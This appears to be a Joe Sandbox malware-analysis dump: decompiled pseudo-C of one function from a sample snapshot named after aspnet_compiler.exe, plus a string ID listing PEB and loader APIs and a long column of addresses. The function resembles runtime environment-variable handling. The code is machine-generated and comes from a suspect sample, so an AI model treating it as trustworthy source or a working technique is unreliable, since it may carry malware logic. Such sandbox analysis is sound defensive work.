                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                • API String ID: 1646373207-3272542945
                • Opcode ID: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                • Instruction ID: df219cf26e896b26ca7b17cc0f8dfcb6cf109bc3019751d44b8154791cbbdf11
                • Opcode Fuzzy Hash: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                • Instruction Fuzzy Hash: 190175E1A4130AAADB10777A6C58D476EDC9EA13503120937B405E2691EEBCD8908D6C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044DCAD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E0044DCAD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E004371B0(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0043EEAD())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x4704e0; // 0x13f4478
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x4704ec; // 0x13f4478
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x4704e0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E0044E355(_t298);
												E00445002(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E00445002( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E0044E355(_t298);
											E00445002(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x4704e0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E004443F4(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E00445002(_t300);
												goto L12;
											} else {
												_t131 = E0044030E(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043A5E8();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00456277(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0043EEAD())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x4704e4; // 0x13fb350
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x4704e8; // 0x13f9178
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x4704e4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E0044E2E8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E0044E355(_t302);
																					E00445002(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E00445002( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E0044E355(_t302);
																				E00445002(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x4704e4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E004443F4(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E00445002(_t304);
																					goto L56;
																				} else {
																					_t148 = E004463E1(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043A5E8();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E004443F4(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E004449F5(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E00445002(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E004443F4(_t262, _t95, 1);
																										E00445002(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E0044030E( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043A5E8();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E004443F4(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E004449F5(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E00445002(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E004443F4(_t267 - _t284 >> 1, _t107, 2);
																																E00445002(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004463E1( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043A5E8();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x4704e0; // 0x13f4478
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004481E9(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0043EEAD();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x4704e0; // 0x13f4478
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x4704e4 = E004443F4(_t246, 1, 4);
																				E00445002(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x4704e0 = E004443F4(_t246, 1, 4);
																				E00445002(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x4704e0 - _t221; // 0x13f4478
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x4704e4; // 0x13fb350
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L004424A7(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x4704e4; // 0x13fb350
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E00445002(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0043EEAD();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0043EEAD();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x4704e0 = E004443F4(_t231, 1, 4);
										E00445002(_t218);
										_t298 =  *0x4704e0; // 0x13f4478
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x4704e4 - _t218; // 0x13fb350
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x4704e4 = E004443F4(_t231, 1, 4);
												E00445002(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x4704e4 - _t218; // 0x13fb350
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x4704e4 - _t218; // 0x13fb350
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L004424A2(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x4704e0; // 0x13f4478
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E00445002(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0043EEAD();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                0x0044dcb6
                0x0044dcbb
                0x0044dcd2
                0x0044dcd4
                0x0044dcd9
                0x0044dcdd
                0x0044dcde
                0x0044dce0
                0x0044dd30
                0x0044dd35
                0x00000000
                0x0044dce2
                0x0044dce2
                0x0044dce4
                0x00000000
                0x0044dce6
                0x0044dce6
                0x0044dcea
                0x0044dcf0
                0x0044dcf3
                0x0044dcf6
                0x0044dcfc
                0x0044dcff
                0x0044dd04
                0x0044dd06
                0x0044dd09
                0x0044dd0a
                0x0044dd0a
                0x0044dd10
                0x0044dd12
                0x0044dd14
                0x0044dda8
                0x0044ddab
                0x0044ddad
                0x0044ddaf
                0x0044ddb0
                0x0044ddb1
                0x0044ddb6
                0x0044ddbb
                0x0044ddbd
                0x0044de07
                0x0044de07
                0x0044de0a
                0x00000000
                0x0044de10
                0x0044de10
                0x0044de12
                0x0044de15
                0x0044de15
                0x0044de18
                0x0044de1a
                0x00000000
                0x0044de20
                0x0044de20
                0x0044de26
                0x00000000
                0x0044de2c
                0x0044de2c
                0x0044de2e
                0x0044de36
                0x0044de38
                0x0044de3d
                0x0044de40
                0x0044de42
                0x00000000
                0x0044de48
                0x0044de48
                0x0044de4b
                0x0044de4d
                0x0044de50
                0x0044de53
                0x00000000
                0x0044de53
                0x0044de42
                0x0044de26
                0x0044de1a
                0x0044ddbf
                0x0044ddbf
                0x0044ddc1
                0x00000000
                0x0044ddc3
                0x0044ddc6
                0x0044ddcc
                0x0044ddcf
                0x0044ddd2
                0x0044dde6
                0x0044dde6
                0x0044dde9
                0x00000000
                0x00000000
                0x0044dde2
                0x0044dde5
                0x0044dde5
                0x0044dde5
                0x0044ddeb
                0x0044dded
                0x0044ddf5
                0x0044ddf7
                0x0044ddfc
                0x0044ddff
                0x0044de01
                0x0044de03
                0x0044de57
                0x0044de57
                0x0044de57
                0x0044ddd4
                0x0044ddd4
                0x0044ddd7
                0x0044ddd9
                0x0044ddd9
                0x0044de5d
                0x0044de60
                0x00000000
                0x0044de66
                0x0044de66
                0x0044de68
                0x0044de6b
                0x0044de6b
                0x0044de6d
                0x0044de6e
                0x0044de6e
                0x0044de7a
                0x0044de82
                0x0044de85
                0x0044de86
                0x0044de88
                0x0044ded1
                0x0044ded2
                0x00000000
                0x0044de8a
                0x0044de91
                0x0044de96
                0x0044de99
                0x0044de9b
                0x0044dedd
                0x0044dede
                0x0044dedf
                0x0044dee0
                0x0044dee1
                0x0044dee2
                0x0044dee7
                0x0044deeb
                0x0044deed
                0x0044def0
                0x0044def1
                0x0044def4
                0x0044def6
                0x0044df08
                0x0044df09
                0x0044df0a
                0x0044df0d
                0x0044df0f
                0x0044df14
                0x0044df18
                0x0044df19
                0x0044df1b
                0x0044df6c
                0x0044df71
                0x00000000
                0x0044df1d
                0x0044df1d
                0x0044df1f
                0x00000000
                0x0044df21
                0x0044df21
                0x0044df27
                0x0044df29
                0x0044df2d
                0x0044df30
                0x0044df33
                0x0044df39
                0x0044df3b
                0x0044df3c
                0x0044df42
                0x0044df45
                0x0044df47
                0x0044df47
                0x0044df4d
                0x0044df4f
                0x0044dfdc
                0x0044dfe7
                0x0044dfea
                0x0044dfef
                0x0044dff4
                0x0044dff6
                0x0044e040
                0x0044e040
                0x0044e043
                0x00000000
                0x0044e049
                0x0044e049
                0x0044e04b
                0x0044e04e
                0x0044e04e
                0x0044e051
                0x0044e053
                0x00000000
                0x0044e059
                0x0044e059
                0x0044e05f
                0x00000000
                0x0044e065
                0x0044e065
                0x0044e067
                0x0044e06f
                0x0044e071
                0x0044e076
                0x0044e079
                0x0044e07b
                0x00000000
                0x0044e081
                0x0044e081
                0x0044e084
                0x0044e086
                0x0044e089
                0x0044e08c
                0x00000000
                0x0044e08c
                0x0044e07b
                0x0044e05f
                0x0044e053
                0x0044dff8
                0x0044dff8
                0x0044dffa
                0x00000000
                0x0044dffc
                0x0044dfff
                0x0044e005
                0x0044e008
                0x0044e00b
                0x0044e01f
                0x0044e01f
                0x0044e022
                0x00000000
                0x00000000
                0x0044e01b
                0x0044e01e
                0x0044e01e
                0x0044e01e
                0x0044e024
                0x0044e026
                0x0044e02e
                0x0044e030
                0x0044e035
                0x0044e038
                0x0044e03a
                0x0044e03c
                0x0044e090
                0x0044e090
                0x0044e090
                0x0044e00d
                0x0044e00d
                0x0044e010
                0x0044e012
                0x0044e012
                0x0044e096
                0x0044e099
                0x00000000
                0x0044e09f
                0x0044e09f
                0x0044e0a1
                0x0044e0a1
                0x0044e0a4
                0x0044e0a4
                0x0044e0a7
                0x0044e0aa
                0x0044e0aa
                0x0044e0b5
                0x0044e0b9
                0x0044e0c1
                0x0044e0c4
                0x0044e0c5
                0x0044e0c7
                0x0044e10e
                0x0044e10f
                0x00000000
                0x0044e0c9
                0x0044e0d1
                0x0044e0d6
                0x0044e0d9
                0x0044e0db
                0x0044e11a
                0x0044e11b
                0x0044e11c
                0x0044e11d
                0x0044e11e
                0x0044e11f
                0x0044e124
                0x0044e127
                0x0044e128
                0x0044e12b
                0x0044e12c
                0x0044e12f
                0x0044e131
                0x0044e13a
                0x0044e13c
                0x0044e13e
                0x0044e140
                0x0044e142
                0x0044e142
                0x0044e145
                0x0044e146
                0x0044e146
                0x0044e142
                0x0044e14c
                0x0044e157
                0x0044e15a
                0x0044e15b
                0x0044e15d
                0x0044e1c4
                0x0044e1c4
                0x00000000
                0x0044e15f
                0x0044e15f
                0x0044e162
                0x0044e1b4
                0x0044e1b6
                0x0044e1bc
                0x00000000
                0x0044e164
                0x0044e164
                0x0044e167
                0x0044e167
                0x0044e169
                0x0044e169
                0x0044e16b
                0x0044e16b
                0x0044e16e
                0x0044e16e
                0x0044e170
                0x0044e171
                0x0044e171
                0x0044e175
                0x0044e179
                0x0044e17d
                0x0044e187
                0x0044e18a
                0x0044e18f
                0x0044e192
                0x0044e196
                0x00000000
                0x0044e198
                0x0044e1a0
                0x0044e1a5
                0x0044e1a8
                0x0044e1aa
                0x0044e1c9
                0x0044e1cb
                0x0044e1cc
                0x0044e1cd
                0x0044e1ce
                0x0044e1cf
                0x0044e1d0
                0x0044e1d5
                0x0044e1d8
                0x0044e1d9
                0x0044e1db
                0x0044e1dc
                0x0044e1dd
                0x0044e1de
                0x0044e1e1
                0x0044e1e3
                0x0044e1ec
                0x0044e1ed
                0x0044e1ef
                0x0044e1f1
                0x0044e1f3
                0x0044e1f6
                0x0044e1f7
                0x0044e1f9
                0x0044e1fb
                0x0044e1fb
                0x0044e1fe
                0x0044e1ff
                0x0044e1ff
                0x0044e1fb
                0x0044e203
                0x0044e20e
                0x0044e212
                0x0044e214
                0x0044e282
                0x0044e282
                0x00000000
                0x0044e216
                0x0044e216
                0x0044e218
                0x0044e272
                0x0044e273
                0x0044e279
                0x00000000
                0x0044e21a
                0x0044e21c
                0x0044e21c
                0x0044e21e
                0x0044e21e
                0x0044e220
                0x0044e220
                0x0044e223
                0x0044e223
                0x0044e226
                0x0044e229
                0x0044e229
                0x0044e235
                0x0044e239
                0x0044e241
                0x0044e247
                0x0044e24c
                0x0044e24f
                0x0044e253
                0x00000000
                0x0044e255
                0x0044e25d
                0x0044e262
                0x0044e265
                0x0044e267
                0x0044e287
                0x0044e289
                0x0044e28a
                0x0044e28b
                0x0044e28c
                0x0044e28d
                0x0044e28e
                0x0044e293
                0x0044e296
                0x0044e299
                0x0044e29a
                0x0044e29b
                0x0044e29c
                0x0044e2a2
                0x0044e2a4
                0x0044e2a7
                0x0044e2d3
                0x0044e2d3
                0x0044e2d3
                0x0044e2d8
                0x0044e2a9
                0x0044e2a9
                0x0044e2ac
                0x0044e2b2
                0x0044e2b7
                0x0044e2ba
                0x0044e2bc
                0x00000000
                0x0044e2be
                0x0044e2c0
                0x0044e2c3
                0x0044e2c5
                0x0044e2e1
                0x0044e2e3
                0x0044e2c7
                0x0044e2c7
                0x0044e2c9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044e2c9
                0x0044e2c5
                0x00000000
                0x0044e2cb
                0x0044e2cb
                0x0044e2ce
                0x0044e2ce
                0x00000000
                0x0044e2ac
                0x0044e2da
                0x0044e2e0
                0x00000000
                0x00000000
                0x00000000
                0x0044e267
                0x00000000
                0x0044e269
                0x0044e269
                0x0044e26c
                0x0044e26c
                0x0044e270
                0x0044e270
                0x00000000
                0x0044e270
                0x0044e218
                0x0044e1e5
                0x0044e1e5
                0x0044e27d
                0x0044e281
                0x0044e281
                0x00000000
                0x00000000
                0x00000000
                0x0044e1aa
                0x00000000
                0x0044e1ac
                0x0044e1ac
                0x0044e1af
                0x0044e1af
                0x00000000
                0x0044e1b3
                0x0044e162
                0x0044e133
                0x0044e133
                0x0044e1bf
                0x0044e1c3
                0x0044e1c3
                0x0044e0dd
                0x0044e0e1
                0x0044e0e4
                0x0044e0ee
                0x0044e0f6
                0x0044e0fc
                0x0044e0fe
                0x0044e100
                0x0044e105
                0x0044e105
                0x0044e108
                0x0044e108
                0x00000000
                0x0044e0fe
                0x0044e0db
                0x0044e0c7
                0x0044e099
                0x0044dffa
                0x0044df55
                0x0044df55
                0x0044df5a
                0x0044df5d
                0x0044df8a
                0x0044df8a
                0x0044df8c
                0x00000000
                0x0044df8e
                0x0044df8e
                0x0044df90
                0x0044dfbb
                0x0044dfc5
                0x0044dfca
                0x0044dfcf
                0x00000000
                0x0044df92
                0x0044df9c
                0x0044dfa1
                0x0044dfa6
                0x0044dfa9
                0x0044dfaf
                0x00000000
                0x0044dfb1
                0x0044dfb1
                0x0044dfb7
                0x0044dfb9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dfb9
                0x0044dfaf
                0x0044df90
                0x0044df5f
                0x0044df5f
                0x0044df61
                0x00000000
                0x0044df63
                0x0044df63
                0x0044df68
                0x0044df6a
                0x0044dfd2
                0x0044dfd2
                0x0044dfd8
                0x0044dfda
                0x0044df77
                0x0044df77
                0x0044df77
                0x0044df7a
                0x0044df7b
                0x0044df82
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044df6a
                0x0044df61
                0x0044df5d
                0x0044df4f
                0x0044df1f
                0x0044def8
                0x0044def8
                0x0044defd
                0x0044df03
                0x0044df85
                0x0044df89
                0x0044df89
                0x0044de9d
                0x0044dea6
                0x0044deae
                0x0044deb2
                0x0044deb9
                0x0044debf
                0x0044dec1
                0x0044dec3
                0x0044dec8
